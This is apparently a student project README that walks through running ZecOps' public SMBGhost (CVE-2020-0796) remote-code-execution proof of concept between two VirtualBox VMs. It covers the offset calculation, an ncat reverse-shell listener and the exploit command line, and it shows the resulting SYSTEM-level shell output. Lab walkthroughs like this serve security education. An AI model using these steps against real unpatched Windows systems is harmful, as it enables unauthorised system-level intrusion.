This project demonstrates a proof-of-concept (PoC) exploit of CVE-2020-0796, also known as SMBGhost - a critical pre-auth RCE vulnerability affecting Windows 10 and Windows Server systems using SMBv3. This was developed as part of a school cybersecurity project. All exploit code credit goes to ZecOps. I have only used and adapted it for educational purposes to demonstrate exploitation of CVE-2020-0796 within a controlled lab environment.
To replicate this demonstration, the following setup is required:
- VirtualBox (using NATNetwork for VM networking)
- Windows 10 (any recent version)
- Python 3.x (added to system PATH)
- Netcat (included with Nmap or installed separately)
- Exploit script from GitHub PoC:
SMBleedingGhost.pyby ZecOps
- VirtualBox (same NATNetwork configuration)
- Windows 10 version 1903, release 19H1
Build 18362.356 – 2019.09, Home or Pro Edition (x64) - Windows Firewall disabled (to allow port 445 access)
- Offset calculation script from GitHub PoC:
calc_target_offsets.batby ZecOps
-
Launch Command Prompt on both the Attacker and Target virtual machines.
-
Execute the following command in each machine:
ipconfig
- Take note of the IP addresses of the VMs — you’ll use them in the later steps.
- On the Target VM, navigate to the
CVE-2020-0796-RCE-POC-masterfolder. - Double-click to run the script:
calc_target_offsets.bat
- This will generate memory offsets required for the exploit.
- Keep the window open and take note of the values shown — you’ll use them in the next step.
- On the Attacker VM, open the same
CVE-2020-0796-RCE-POC-masterfolder. - Right-click
SMBleedingGhost.pyand open with Notepad. - In the
SMBleedingGhost.pyfile, scroll down and locate the section that begins withOFFSETS = {. - Replace the existing offset values with the ones you obtained from the Target VM.
- Save the file after editing.
- You may now close the offset window on the Target VM.
Open a new Command Prompt and run:
ncat -lvp 4321- This sets up a listener on port
4321to receive a reverse shell from the Target VM upon successful exploitation. - You can change the port number if needed.
- Open another Command Prompt and navigate to the PoC directory (I saved mine in Desktop):
cd Desktop
cd CVE-2020-0796-RCE-POC-master
dir- Run the exploit with the appropriate IPs and port:
python SMBleedingGhost.py <target_ip> <attacker_ip> <port>
Example used in this demo:
python SMBleedingGhost.py 192.168.18.61 192.168.18.62 4321192.168.18.61: Target VM IP192.168.18.62: Attacker VM IP4321: Port used in the netcat listener
If successful, the netcat window will show:
Microsoft Windows [Version 10.0.18362.356]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
This confirms that:
- The Target VM has been exploited
- The Attacker VM now has system-level privileges
You can validate access by executing:
whoamiThis will give:
whoami
nt authority\system
This means that the Attacker VM now has system-level privileges on the Target VM.
You can also run:
ipconfigTo verify you’re interacting with the Target VM’s network.
Note: The Target VM may crash after exploitation. If it does, you may restart it. The attacker session will need to be re-established after reboot.
This demonstration is based on the publicly available proof-of-concept developed by ZecOps.
All exploit code credit goes to ZecOps. I have only used and adapted it for educational purposes to demonstrate exploitation of CVE-2020-0796 within a controlled lab environment.
This repository is created for educational purposes only.
All tools, scripts, and techniques demonstrated are intended to help understand cybersecurity vulnerabilities in a controlled lab environment. Do not attempt to use any of the provided materials on systems or networks that you do not own or have explicit permission to test.
Any misuse of the software will not be the responsibility of the author.